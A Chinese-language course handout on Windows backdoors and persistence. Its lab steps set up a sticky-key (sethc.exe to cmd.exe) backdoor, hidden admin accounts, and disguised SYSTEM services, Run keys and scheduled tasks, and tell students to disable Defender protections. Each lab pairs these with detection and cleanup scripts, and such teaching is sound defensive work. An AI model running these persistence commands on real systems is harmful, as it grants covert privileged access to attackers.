Skip to content
教学文档

07.项目七 Windows应用安全

07.项目七 Windows应用安全

Section titled “07.项目七 Windows应用安全”

📌 课前回顾

Section titled “📌 课前回顾”

本项目以前序项目所建立的服务器运维与安全加固知识为基础,从攻击者视角切入应用层安全问题,建立先验知识桥梁。

回顾问题:

  1. 项目四中阐述的 IIS 网站安全加固四层纵深防御分别是什么?(日志审计、请求筛选、安全响应头、权限与 HTTPS)
  2. 当 Web 服务器的上传目录同时被授予”写入”与”脚本执行”权限时,将产生何种安全后果?
  3. Windows Server 中以 SYSTEM 权限运行的服务存在哪些固有安全隐患?
  4. 项目六域管理中,攻击者获取 NTDS.dit 数据库后可实施哪些后续攻击?
  5. 何为”最小权限原则”?该原则在 IIS 应用程序池配置中如何体现?

🔗

知识衔接:前序项目按”服务搭建 → 网站部署 → 安全加固 → 远程管理 → 域管理”构成了完整的服务器运维链。本项目转换视角,从攻击者的角度系统讲解 Windows 应用层的后门植入、WebShell 上传与持久化控制机制——通过理解攻击实现原理,方能制定有针对性的防御策略,这正是”知攻善防”这一信息安全人才核心素养的体现。

⚠️

声明:本项目内容仅用于授权环境下的安全教学与攻防演练。严禁对未经授权的系统实施任何渗透测试行为,违者将依法承担相应法律责任。

🎯 学习目标

Section titled “🎯 学习目标”
层次内容
知识理解后门(Backdoor)的定义、分类与工作原理;掌握Windows系统中常见的持久化技术(注册表、计划任务、服务、WMI、粘滞键);理解WebShell的分类、工作原理与文件上传漏洞利用链;了解木马的分类与反弹Shell的通信原理
技能能够创建和检测各类Windows持久化后门;能够综合排查系统中的常见启动项与自启动位置;能够上传WebShell并利用其执行远程命令;能够使用PowerShell脚本检测和清除各类后门;能够对phpStudy/Apache环境进行WebShell防护加固
素养树立”知攻善防”的安全意识,理解攻防对抗的本质;强化法律意识,明确未授权渗透测试的法律后果;培养应急响应思维——发现后门后如何系统化清除

⚠️ 重难点梳理

Section titled “⚠️ 重难点梳理”
类型内容说明
重点Windows常见持久化技术的原理与实现注册表Run键、计划任务、系统服务、WMI事件订阅、粘滞键替换——理解每种技术的触发机制和运行原理是检测和防御的基础
重点WebShell的分类与一句话木马工作原理理解小马/大马/一句话木马的区别,以及客户端(蚁剑/冰蝎/哥斯拉)如何与WebShell通信
重点后门检测与清除的系统化流程掌握从注册表、计划任务、服务、WMI、网络连接、进程等多维度全面排查后门的方法
难点WMI事件订阅后门的原理与检测WMI事件订阅涉及过滤器、消费者、绑定三个组件,理解三者关系和如何彻底清除是难点
难点免杀技术与现代WebShell对抗理解为什么传统杀软难以检测内存马、加密WebShell等现代攻击技术,以及对应的防御思路(EDR、RASP)
难点文件上传漏洞绕过技术前端验证绕过、Content-Type修改、扩展名黑名单绕过、图片马等技术需要理解后端验证逻辑

任务一 Windows应用后门

Section titled “任务一 Windows应用后门”

🧠 理论知识

Section titled “🧠 理论知识”

后门(Backdoor)的概念

Section titled “后门(Backdoor)的概念”

什么是后门?

Section titled “什么是后门?”

后门(Backdoor)是指攻击者预先在目标系统中植入的、能够绕过常规身份认证机制的隐蔽访问通道。其功能在于:即便初始的访问凭据失效或被回收,攻击者仍可凭借该通道重新进入系统。

类比说明:可将系统的常规登录视为建筑物的正规门禁——用户须通过身份验证方可进入;攻击者在首次入侵后预留的后门,则相当于在隐蔽位置加设的暗门——即使正规门禁的口令被重置,攻击者仍可凭该暗门反复进出。

正常的登录流程:
用户 ──输入账号密码──→ 认证系统 ──验证通过──→ 系统资源
                        ✅ 合法


后门的隐蔽通道:
攻击者 ──暗门通道──→ 系统资源
         🔓 绕过认证

后门的分类

Section titled “后门的分类”

Windows系统中常见的后门类型:

类型说明触发机制示例
账户后门创建隐藏的高权限用户账户使用$符号隐藏账户名net user admin$ P@ss /add
服务后门以系统服务形式运行恶意程序系统启动时自动运行sc create创建恶意服务
注册表后门修改注册表实现开机自启动用户登录时触发Run键、RunOnce键
计划任务后门定时或特定条件下执行恶意任务定时/登录/启动时触发schtasks创建任务
WMI事件订阅利用WMI事件触发恶意代码系统事件触发,极难检测永久事件订阅
DLL劫持替换合法DLL为恶意DLL程序启动时加载搜索顺序劫持
粘滞键后门替换辅助功能程序登录界面按键触发sethc.exe替换
端口复用后门复用合法服务端口建立隐蔽通道网络连接到达时触发复用已有管理端口建立隐蔽通道

💡 持久化(Persistence) 是后门的核心目的。攻击者获取初始访问后,必须建立持久化机制,确保重启、密码更改、补丁更新后仍能重新进入系统。MITRE ATT&CK框架将持久化列为攻击链的关键阶段(TA0003)。

后门攻击链全景图

Section titled “后门攻击链全景图”
攻击者获取初始访问权限(如利用漏洞、钓鱼邮件、弱密码)
    
    ├── 1. 权限提升(Privilege Escalation)
    │       本地漏洞利用 → 获取SYSTEM权限
    
    ├── 2. 植入后门(Persistence) ←── 本任务重点
    │       注册表/计划任务/服务/WMI/DLL劫持
    
    ├── 3. 横向移动(Lateral Movement)
    │       利用后门跳板访问内网其他机器
    
    └── 4. 数据窃取/破坏(Impact)
            最终目的

后门技术详解

Section titled “后门技术详解”

1. Windows系统服务后门

Section titled “1. Windows系统服务后门”

原理:Windows服务在系统启动时自动运行,且以SYSTEM权限运行。攻击者可以创建一个伪装成合法服务的恶意服务,实现开机自启动的持久化后门。

服务的关键属性

属性说明用于伪装的技巧
服务名称系统内部标识使用类似系统服务的名称,如WindowsUpdateHelper
显示名称服务管理器中显示的名称使用欺骗性的显示名称
启动类型自动/手动/禁用设为auto(自动)确保开机启动
二进制路径服务执行的程序路径指向恶意程序路径
描述信息服务描述文本填写看似合法的描述信息
运行身份服务运行的账户默认为SYSTEM(最高权限)
服务后门的运作机制:
    系统启动
       
    服务控制管理器(SCM)读取注册表
       
    根据Services键下的配置启动服务
       
    以SYSTEM权限运行恶意程序
       
    攻击者获得持久化访问

创建服务后门的命令

Terminal window
# 创建伪装服务(PowerShell中必须用sc.exe,因为sc是Set-Content的别名)
sc.exe create "WindowsUpdateHelper" binpath="C:\Windows\Temp\malware.exe" start=auto
sc.exe description "WindowsUpdateHelper" "Provides Windows Update support services"
sc.exe start "WindowsUpdateHelper"


# 查看服务配置
sc.exe qc "WindowsUpdateHelper"
sc.exe query "WindowsUpdateHelper"

🔍 检测线索:通过 sc query type=service state=allGet-Service 查看所有服务,重点关注启动类型为”自动”但名称/描述可疑、二进制路径指向Temp等非常规目录的服务。

2. 注册表持久化后门

Section titled “2. 注册表持久化后门”

原理:Windows注册表中有多个”自动启动”位置,在这些位置添加恶意程序的路径,即可在用户登录或系统启动时自动执行恶意代码。

常用注册表持久化路径

注册表路径触发时机适用范围检测难度
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run用户登录时所有用户⭐⭐(易)
HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run用户登录时当前用户⭐⭐(易)
HKLM\...\CurrentVersion\RunOnce下次启动时运行一次所有用户⭐⭐(易)
HKLM\...\Policies\Explorer\Run用户登录时(策略级)所有用户⭐⭐⭐(中)
HKLM\SYSTEM\CurrentControlSet\Services系统启动服务形式⭐⭐⭐(中)
HKLM\...\Image File Execution Options指定进程启动时所有用户⭐⭐⭐⭐(难)

💡 AppInit_DLLsImage File Execution Options (IFEO) 是更高级的注册表持久化技术。IFEO可以通过设置Debugger值来劫持任意进程——当目标程序启动时,实际执行的是攻击者指定的程序。

注册表Run键的工作原理

用户输入密码登录Windows
       
Winlogon.exe启动用户Shell(通常是explorer.exe)
       
Explorer.exe读取注册表Run键中的所有值
       
依次执行每个键值对应的程序路径
       
恶意程序被自动启动,以当前用户权限运行

3. 计划任务后门

Section titled “3. 计划任务后门”

原理:Windows任务计划程序允许在指定时间、特定事件发生时自动执行程序。攻击者可以创建隐藏的计划任务,实现定时或触发式执行恶意代码。

计划任务的触发方式

触发方式说明适用场景
系统启动时(onstart)计算机开机后自动执行需要尽早执行的后门
用户登录时(onlogon)用户登录后自动执行以当前用户身份执行
定时执行(daily/weekly)指定时间自动执行定期回连C2服务器
空闲时(onidle)计算机空闲一段时间后执行避免引起用户注意
事件触发(onevent)特定Windows事件发生时执行高级隐蔽触发

创建计划任务后门

Terminal window
# 开机自启动(SYSTEM权限)
schtasks /create /tn "SystemHealthCheck" /tr "C:\Windows\Temp\malware.exe" /sc onstart /ru SYSTEM /f


# 每天凌晨3点执行(模拟系统维护)
schtasks /create /tn "DiskCleanup" /tr "C:\Windows\Temp\malware.exe" /sc daily /st 03:00 /ru SYSTEM /f


# 用户登录时执行
schtasks /create /tn "UserProfileSync" /tr "C:\Windows\Temp\malware.exe" /sc onlogon /f


# 查看任务详情
schtasks /query /tn "SystemHealthCheck" /fo LIST /v

🔍 检测线索:使用 schtasks /query /fo TABLEGet-ScheduledTask 列出所有计划任务,重点排查作者非Microsoft、执行路径指向非标准目录、名称模仿系统任务的任务。

4. WMI事件订阅后门

Section titled “4. WMI事件订阅后门”

原理:WMI(Windows Management Instrumentation)是Windows的管理框架,支持事件订阅机制。攻击者可以创建永久事件订阅,当特定事件发生时自动执行恶意命令。WMI后门是最高级的持久化技术之一,因为它不需要在磁盘上存放恶意文件,完全在WMI数据库中存储。

WMI事件订阅的三个组件

WMI事件订阅的运作机制:


┌────────────────────┐     ┌────────────────────┐     ┌──────────────────┐
│   事件过滤器        │     │   事件消费者        │     │   绑定关系        │
│   __EventFilter     │────→│   CommandLineEvent  │────→│  __FilterTo       │
│                     │     │   Consumer          │     │  ConsumerBinding  │
│ 定义"什么事件触发" │     │ 定义"触发后做什么" │     │ 连接过滤器和消费者│
│                     │     │                     │     │                   │
│ 例:每60秒系统性能  │     │ 例:执行恶意程序    │     │ 三者缺一不可      │
│ 数据变化事件        │     │                     │     │                   │
└────────────────────┘     └────────────────────┘     └──────────────────┘


触发流程:
    系统事件发生(如每60秒的性能计数器更新)
       
    WMI检查__EventFilter → 匹配过滤条件
       
    通过__FilterToConsumerBinding找到关联的Consumer
       
    执行CommandLineEventConsumer中指定的命令
       
    恶意代码被执行(无文件落地,极难检测)

WMI后门为什么难以检测?

特征说明
无文件落地恶意代码存储在WMI数据库中,不在文件系统上
无进程残留只在事件触发时短暂执行,平时无恶意进程
无注册表Run键不使用常见的启动项,绕过常规检测
以SYSTEM权限运行WMI提供者默认以SYSTEM身份执行
可跨系统持久化可配置为永久订阅,重启后仍然存在

5. DLL劫持后门

Section titled “5. DLL劫持后门”

原理:Windows程序在加载DLL时,按照特定的搜索顺序查找DLL文件。攻击者可以将恶意DLL放置在搜索顺序靠前的位置,使程序优先加载恶意DLL而非合法DLL。

DLL搜索顺序

Windows DLL搜索顺序(默认):
    1. 应用程序所在目录          ← 最常被利用
    2. 系统目录(System32)
    3. 16位系统目录
    4. Windows目录
    5. 当前工作目录
    6. PATH环境变量中的目录

攻击场景示例

某合法程序 C:\Tools\app.exe 启动时需要加载 userenv.dll


攻击者在 C:\Tools\ 盘下放置恶意的 userenv.dll
       
app.exe 启动 → 搜索 userenv.dll
       
优先在应用程序目录找到恶意 userenv.dll → 加载执行
       
恶意DLL在被加载时执行攻击代码,同时转发调用给合法DLL
       
程序正常运行,用户无感知

🔍 检测线索:使用Process Monitor监控程序的DLL加载行为,查找从非标准路径加载的DLL;使用 signtool 验证DLL的数字签名是否合法。

6. 粘滞键后门(辅助功能后门)

Section titled “6. 粘滞键后门(辅助功能后门)”

原理:Windows登录界面提供辅助功能(如粘滞键sethc.exe、放大镜magnify.exe、屏幕键盘osk.exe、辅助功能管理器utilman.exe等),这些程序以SYSTEM权限运行且无需登录即可触发。将其中某个程序替换为cmd.exe后,攻击者可在登录界面直接获得SYSTEM权限的命令行。

粘滞键后门的运作机制:
    登录界面(未认证状态)
       
    连续按5次Shift键
       
    Windows启动 C:\Windows\System32\sethc.exe
       
    正常:弹出粘滞键设置对话框
    被替换后:弹出 cmd.exe(以SYSTEM权限运行)
       
    攻击者可在命令行中创建后门账户、修改密码等

权限继承机制:登录界面的辅助功能由 Winlogon.exe(Windows 登录进程)启动,Winlogon.exe 自身以 SYSTEM 身份运行,因此其所派生的子进程默认继承 SYSTEM 权限——这正是粘滞键后门得以提权的本质原因。

💡 现代防御:Windows Vista以后的系统已启用Windows Resource Protection (WRP),由TrustedInstaller保护System32目录下的关键文件,即使管理员也无法直接替换。配合Secure Boot可进一步限制启动阶段的篡改。但通过WinPE离线环境或先获取TrustedInstaller权限仍可实现类似攻击。

🛠️ 实践操作

Section titled “🛠️ 实践操作”

实验环境说明

Section titled “实验环境说明”

本任务的实验操作需要以下环境:

  • 靶机:Windows Server 2022/2025(虚拟机,实验前创建快照)
  • 攻击机:Kali Linux(安装Metasploit Framework)
  • 网络:两台虚拟机处于同一NAT网络,能互相通信
  • 重要提示:实验前请关闭Windows Defender实时防护,或将其排除实验目录

⚠️ Windows Server 2025 特别说明

  • Server 2025 默认启用 VBS(基于虚拟化的安全) 和增强版 Windows Defender,关闭实时防护需通过组策略:gpedit.msc → 计算机配置 → 管理模板 → Windows 组件 → Microsoft Defender 防病毒 → 实时保护 → 启用”关闭实时保护”策略
  • 如果组策略无效,还需关闭”篡改防护”:Windows 安全中心 → 病毒和威胁防护 → 管理设置 → 关闭”篡改防护”(必须先关闭此项,组策略才能生效)
  • Server 2025 的 PowerShell 5.1 仍支持 Get-WmiObject,但微软建议使用 Get-CimInstance 替代(功能等价,语法略有不同)
  • PowerShell 中 scSet-Content 的别名,不是服务控制命令!在 PowerShell 中操作服务必须使用 sc.exe createsc.exe delete 等完整路径。在 CMD 命令提示符中则可以直接使用 sc

实验1:Windows “5次Shift” 粘滞键后门

Section titled “实验1:Windows “5次Shift” 粘滞键后门”

原理回顾:登录界面按5次Shift键启动sethc.exe(以SYSTEM权限运行),将其替换为cmd.exe即可在登录界面获得SYSTEM命令行。

⚠️ Server 2025 兼容性说明:Windows Server 2025 默认启用 Credential Guard 和 VBS(基于虚拟化的安全),系统文件保护更强。如果 takeownicacls 命令执行后仍无法替换 sethc.exe,需要在虚拟机设置中关闭 VBS:bcdedit /set hypervisorlaunchtype off 并重启,或通过 WinPE 启动盘离线替换文件。教学环境中建议在安装系统时不启用 VBS 功能。

操作步骤

第一步:以管理员身份替换系统文件

Terminal window
# 需要以管理员身份运行PowerShell


# 查看原sethc.exe的文件信息
Get-Item C:\Windows\System32\sethc.exe | Select-Object Name, Length, LastWriteTime


# 备份原文件
Copy-Item C:\Windows\System32\sethc.exe C:\Windows\System32\sethc.exe.bak


# 获取文件所有权(默认受TrustedInstaller保护)
takeown /f C:\Windows\System32\sethc.exe /a


# 授予管理员完全控制权限
icacls C:\Windows\System32\sethc.exe /grant administrators:F


# 替换为cmd.exe
Copy-Item C:\Windows\System32\cmd.exe C:\Windows\System32\sethc.exe -Force

⚠️ 预期结果:每条命令执行后无报错即为成功。takeown 应输出”成功: 文件(或文件夹): … 现在由 administrators 组拥有”。icacls 应输出”已成功处理 1 个文件”。

第二步:验证后门

  1. 注销当前用户,回到登录界面(或锁定屏幕)
  2. 连续快速按5次 Shift
  3. 如果后门成功,将弹出以SYSTEM权限运行的命令提示符窗口
  4. 在命令行中验证权限:
Terminal window
whoami
:: 预期输出:nt authority\system


:: 创建后门管理员账户(演示用途)
net user backdoor P@ssw0rd123 /add
net localgroup administrators backdoor /add

第三步:恢复原文件

Terminal window
# 恢复原始sethc.exe
Copy-Item C:\Windows\System32\sethc.exe.bak C:\Windows\System32\sethc.exe -Force


# 恢复文件权限
icacls C:\Windows\System32\sethc.exe /reset


# 删除后门账户(如果创建了)
net user backdoor /delete

界面方式恢复

  1. 打开”文件资源管理器”,导航到 C:\Windows\System32\
  2. 找到 sethc.exe.bak,右键 → 重命名为 sethc.exe(覆盖当前文件)
  3. 如果提示权限不足,右键 sethc.exe → 属性 → 安全 → 高级 → 更改所有者为 Administrators

🛡️ 最简单有效的防御:通过注册表 IFEO(映像文件执行选项)阻止 sethc.exe 被利用。打开 regedit,导航到 HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\,新建项 sethc.exe,在该项下新建字符串值 Debugger,数据留空。这样即使 sethc.exe 被替换,系统也不会执行它。同样的方法可应用于 utilman.exeosk.exemagnify.exe 等其他辅助功能程序。此方法在 Windows Server 2016~2025 所有版本上均有效。

防御措施

防御方法说明
启用Secure Boot防止在启动阶段篡改系统文件
Windows Resource Protection (WRP)TrustedInstaller保护System32关键文件
启用BitLocker磁盘加密防止通过WinPE离线替换文件
监控System32文件哈希变化使用文件完整性监控工具(FIM)

实验2:注册表Run键后门

Section titled “实验2:注册表Run键后门”

操作步骤

第一步:创建注册表后门

💡 说明:注册表 Run 键仅记录”登录时所执行的程序路径”,目标程序是否存在不影响注册表项的写入。本实验聚焦于注册表后门的创建、检测、清除完整流程,因此先创建一个无害的占位程序用于演示。

Terminal window
# 创建模拟后门程序(仅写日志,无恶意行为)
Set-Content -Path "C:\Windows\Temp\backdoor.exe" -Value "echo backdoor > C:\Windows\Temp\backdoor.log" -Encoding ASCII

命令行方式

Terminal window
# 方法一:使用reg命令
reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "WindowsUpdateHelper" /t REG_SZ /d "C:\Windows\Temp\backdoor.exe" /f


# 方法二:使用PowerShell cmdlet
New-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" `
    -Name "SystemHealthMonitor" `
    -Value "C:\Windows\Temp\backdoor.exe" `
    -PropertyType String -Force


# 验证后门已创建
Get-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run"

⚠️ 预期结果reg add 命令提示”操作成功完成”。Get-ItemProperty 输出中应包含刚添加的 WindowsUpdateHelperSystemHealthMonitor 键值,其数据指向 C:\Windows\Temp\backdoor.exe

界面方式(注册表编辑器)

  1. Win+R,输入 regedit,回车打开注册表编辑器
  2. 左侧导航到:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
  3. 右侧空白区域右键 → 新建 → 字符串值
  4. 名称输入:WindowsUpdateHelper
  5. 双击该值,数据输入:C:\Windows\Temp\backdoor.exe
  6. 确定保存,即可看到新增的启动项

第二步:检测注册表后门

界面方式(注册表编辑器)

  1. 打开 regedit,导航到 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
  2. 右侧面板中逐一检查每个值,关注:名称看似系统服务但路径指向 TempAppData 等非标准目录的项
  3. 同样检查 RunOnceHKCU\...\Run 等其他自启动位置

命令行方式

Terminal window
# 检查所有常见的注册表自启动位置
$autorunPaths = @(
    "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run",
    "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce",
    "HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run",
    "HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce",
    "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run"
)


foreach ($path in $autorunPaths) {
    Write-Host "`n=== $path ===" -ForegroundColor Yellow
    if (Test-Path $path) {
        Get-ItemProperty -Path $path | Format-List
    } else {
        Write-Host "路径不存在" -ForegroundColor Gray
    }
}

第三步:清除注册表后门

界面方式(注册表编辑器)

  1. 打开 regedit,导航到 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
  2. 右键选中可疑的值(如 WindowsUpdateHelper)→ 删除
  3. 确认删除

命令行方式

Terminal window
# 删除恶意启动项
Remove-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" -Name "WindowsUpdateHelper"
Remove-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" -Name "SystemHealthMonitor"


# 验证已清除
Get-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" | Format-List

🛡️ 最简单有效的防御:使用 Windows 自带的 msconfig(系统配置)工具。按 Win+R 输入 msconfig → 切换到”启动”选项卡,可以直观查看并禁用所有自启动项。Windows 10/11 中该功能已整合到”任务管理器”的”启动”选项卡中,右键可直接禁用可疑项。

实验3:系统服务后门

Section titled “实验3:系统服务后门”

操作步骤

第一步:创建模拟后门程序

真实攻击中,后门程序通常由 msfvenom 或类似工具生成。教学环境采用无害脚本进行模拟,重点在于理解服务后门的创建、检测与清除流程。

Terminal window
# 创建一个模拟后门程序(实际只是写日志,无恶意行为)
$script = @'
@echo off
:loop
echo [%date% %time%] Backdoor running >> C:\Windows\Temp\backdoor.log
timeout /t 60 /nobreak >nul
goto loop
'@
Set-Content -Path "C:\Windows\Temp\backdoor.bat" -Value $script -Encoding ASCII


# 用bat包装为可被服务调用的形式(服务需要响应SCM,此处简化演示)
Set-Content -Path "C:\Windows\Temp\backdoor.exe" -Value "placeholder" -Encoding ASCII

💡 说明:Windows 服务要求其可执行文件实现 SCM(服务控制管理器)通信接口;普通 exe 或 bat 直接注册为服务时启动将报错 1053(服务未及时响应)。此现象不影响本实验的教学目标——即掌握可疑服务的创建、检测、删除流程。真实攻击场景中,攻击者所使用的木马已完成 SCM 接口实现。

第二步:创建服务后门

命令行方式

Terminal window
# 创建伪装的系统服务(PowerShell中必须用sc.exe)
sc.exe create "SystemDiagnostic" binpath="C:\Windows\Temp\backdoor.exe" start=auto displayname="System Diagnostic Service"
sc.exe description "SystemDiagnostic" "Monitors system health and performance metrics"


# 尝试启动服务(预期会报错1053,因为模拟程序未实现SCM接口,这是正常的)
sc.exe start "SystemDiagnostic"


# 查看服务配置详情(重点关注:即使服务未成功启动,后门配置已写入注册表)
sc.exe qc "SystemDiagnostic"
sc.exe query "SystemDiagnostic"

⚠️ 预期结果sc qc 会显示服务的 BINARY_PATH_NAME 指向 C:\Windows\Temp\backdoor.exe,START_TYPE 为 AUTO_START。sc start 可能报错1053(服务未及时响应),这不影响实验——关键是理解服务配置已被写入系统。

界面方式(服务管理器)

  1. Win+R,输入 services.msc,回车打开服务管理器
  2. 查看服务列表,可以看到新创建的 “System Diagnostic Service”
  3. 双击该服务,可查看其属性:启动类型(自动)、可执行文件路径、描述等
  4. 注意观察:该服务的”可执行文件的路径”指向 C:\Windows\Temp\ 目录——这是明显的异常特征

第二步:检测可疑服务

界面方式(服务管理器)

  1. Win+R,输入 services.msc,回车
  2. 点击”启动类型”列标题排序,筛选出所有”自动”启动的服务
  3. 逐一检查:重点关注描述模糊、发布者为空、可执行文件路径指向 Temp/AppData/Users 等非标准目录的服务
  4. 右键可疑服务 → 属性 → 查看”可执行文件的路径”

命令行方式

Terminal window
# 列出所有自动启动的服务
Get-Service | Where-Object {$_.StartType -eq "Automatic"} | Format-Table Name, DisplayName, Status, StartType


# 检查非Microsoft服务(重点关注)
Get-WmiObject Win32_Service | Where-Object {
    $_.PathName -notlike "*System32*" -and
    $_.PathName -notlike "*SysWOW64*" -and
    $_.PathName -notlike "*Program Files*"
} | Select-Object Name, DisplayName, PathName, StartMode | Format-Table -AutoSize


# 检查服务的可执行文件数字签名
Get-WmiObject Win32_Service | ForEach-Object {
    $path = $_.PathName -replace '"',''
    if (Test-Path $path) {
        $sig = Get-AuthenticodeSignature $path
        if ($sig.Status -ne "Valid") {
            [PSCustomObject]@{
                ServiceName = $_.Name
                Path = $path
                SignatureStatus = $sig.Status
            }
        }
    }
}

第三步:清除服务后门

界面方式(服务管理器)

  1. 打开 services.msc,找到可疑服务 “System Diagnostic Service”
  2. 右键 → 停止(先停止服务运行)
  3. 右键 → 属性 → 启动类型改为”禁用”
  4. 服务管理器无法直接删除服务,需使用命令行 sc delete 完成删除

命令行方式

Terminal window
# 停止并删除恶意服务
sc.exe stop "SystemDiagnostic"
sc.exe delete "SystemDiagnostic"


# 删除恶意文件
Remove-Item "C:\Windows\Temp\backdoor.exe" -Force -ErrorAction SilentlyContinue

🛡️ 最简单有效的防御:启用 Windows Defender 的”篡改防护”(Tamper Protection)功能。打开 Windows 安全中心 → 病毒和威胁防护 → 管理设置 → 开启”篡改防护”。该功能会阻止非授权程序修改安全设置和创建可疑服务。同时,定期使用 Autoruns(微软 Sysinternals 工具)检查所有自启动服务。

实验4:计划任务后门

Section titled “实验4:计划任务后门”

操作步骤

第一步:创建计划任务后门

💡 说明:计划任务仅记录”在何种条件下执行何种程序”,目标程序是否存在不影响任务的注册。本实验聚焦于计划任务后门的创建、检测与清除完整流程。

命令行方式

Terminal window
# 先创建一个模拟后门脚本(用于验证任务确实被触发)
Set-Content -Path "C:\Windows\Temp\backdoor.bat" -Value '@echo %date% %time% >> C:\Windows\Temp\task_triggered.log' -Encoding ASCII


# 开机自启动(SYSTEM权限)
schtasks /create /tn "SystemHealthCheck" /tr "C:\Windows\Temp\backdoor.bat" /sc onstart /ru SYSTEM /f


# 每天凌晨3点执行
schtasks /create /tn "DiskCleanupTask" /tr "C:\Windows\Temp\backdoor.bat" /sc daily /st 03:00 /ru SYSTEM /f


# 用户登录时执行
schtasks /create /tn "UserProfileSync" /tr "C:\Windows\Temp\backdoor.bat" /sc onlogon /f


# 验证计划任务已创建
schtasks /query /tn "SystemHealthCheck" /fo LIST /v

⚠️ 预期结果:三条命令均提示”成功: 成功创建计划任务”。schtasks /query 会显示任务名称、下次运行时间、状态(就绪)、要运行的任务路径等信息。

界面方式(任务计划程序)

  1. Win+R,输入 taskschd.msc,回车打开任务计划程序
  2. 左侧选择”任务计划程序库”
  3. 右侧”操作”面板 → 点击”创建基本任务”
  4. 名称输入:SystemHealthCheck,描述随意填写,下一步
  5. 触发器选择”计算机启动时”,下一步
  6. 操作选择”启动程序”,程序路径填 C:\Windows\Temp\backdoor.exe,下一步
  7. 勾选”打开属性对话框”,完成
  8. 在属性对话框中,勾选”使用最高权限运行”,确定

第二步:检测可疑计划任务

界面方式(任务计划程序)

  1. 打开 taskschd.msc,展开左侧”任务计划程序库”
  2. 逐一检查每个任务:右键 → 属性
  3. 重点关注”操作”选项卡中程序路径指向 TempAppData 等非标准目录的任务
  4. 检查”常规”选项卡中”使用最高权限运行”且作者非 Microsoft 的任务
  5. 检查”触发器”选项卡中设置为”启动时”或”登录时”的可疑任务

命令行方式

Terminal window
# 列出所有非Microsoft的计划任务
Get-ScheduledTask | Where-Object {$_.Author -notlike "Microsoft*" -and $_.Author -ne $null} |
    Select-Object TaskName, TaskPath, State, @{N="Author";E={$_.Author}} |
    Format-Table -AutoSize


# 列出所有以SYSTEM权限运行的计划任务
Get-ScheduledTask | Where-Object {
    $_.Principal.UserId -eq "SYSTEM" -or $_.Principal.UserId -eq "NT AUTHORITY\SYSTEM"
} | Select-Object TaskName, TaskPath, State |
    Format-Table -AutoSize


# 查看所有任务的详细信息(包括执行的程序路径)
Get-ScheduledTask | Get-ScheduledTaskInfo | Format-Table TaskName, LastRunTime, NextRunTime -AutoSize

第三步:清除计划任务后门

界面方式(任务计划程序)

  1. 打开 taskschd.msc,在任务列表中找到可疑任务(如 SystemHealthCheck
  2. 右键该任务 → 删除,确认删除
  3. 重复操作删除其他可疑任务

命令行方式

Terminal window
# 删除恶意计划任务
schtasks /delete /tn "SystemHealthCheck" /f
schtasks /delete /tn "DiskCleanupTask" /f
schtasks /delete /tn "UserProfileSync" /f


# 验证清除结果
Get-ScheduledTask | Where-Object {$_.TaskName -in @("SystemHealthCheck","DiskCleanupTask","UserProfileSync")} | Select-Object TaskName, State

🛡️ 最简单有效的防御:通过组策略限制计划任务的创建权限。打开 gpedit.msc → 计算机配置 → Windows 设置 → 安全设置 → 本地策略 → 用户权限分配 → “作为批处理作业登录”,仅保留必要的账户。同时开启”对象访问审核”策略,监控计划任务的创建和修改事件(事件ID 4698/4702)。

实验5:Windows 常见启动项综合排查与清除

Section titled “实验5:Windows 常见启动项综合排查与清除”

本实验不再引入新的后门类型,而是将注册表、计划任务、服务、启动文件夹等自启动位置进行系统化整合,构建完整的排查方法论。

第一步:认识常见启动项位置

Windows 中常见的自启动位置包括:

  • 注册表 Run / RunOnce 键
  • 启动文件夹(当前用户 / 所有用户)
  • 计划任务
  • 自动启动服务
  • 登录脚本与策略启动项

第二步:界面方式排查启动项

  1. Ctrl+Shift+Esc 打开任务管理器,切换到“启动应用”选项卡
  2. 观察是否存在名称可疑、发布者未知、启动影响高的项目
  3. Win+R,输入 shell:startup,检查当前用户启动文件夹
  4. Win+R,输入 shell:common startup,检查所有用户启动文件夹
  5. 打开 services.msc,重点查看启动类型为“自动”的可疑服务
  6. 打开 taskschd.msc,检查非系统创建的计划任务

第三步:命令行方式综合排查

Terminal window
# 1. 检查常见注册表启动项
Get-ItemProperty "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run"
Get-ItemProperty "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce"
Get-ItemProperty "HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run"
Get-ItemProperty "HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce"
Get-ItemProperty "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run" -ErrorAction SilentlyContinue


# 2. 检查启动文件夹中的文件
Get-ChildItem "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup" -Force
Get-ChildItem "$env:ProgramData\Microsoft\Windows\Start Menu\Programs\Startup" -Force


# 3. 检查自动启动服务
Get-CimInstance Win32_Service | Where-Object {$_.StartMode -eq "Auto"} |
    Select-Object Name, DisplayName, State, StartMode, PathName


# 4. 检查非Microsoft计划任务
Get-ScheduledTask | Where-Object {
    $_.Author -notlike "Microsoft*" -and $_.TaskPath -notlike "\Microsoft*"
} | Select-Object TaskName, TaskPath, Author, State


# 5. 检查登录脚本相关配置
Get-ItemProperty "HKCU:\Environment" -ErrorAction SilentlyContinue
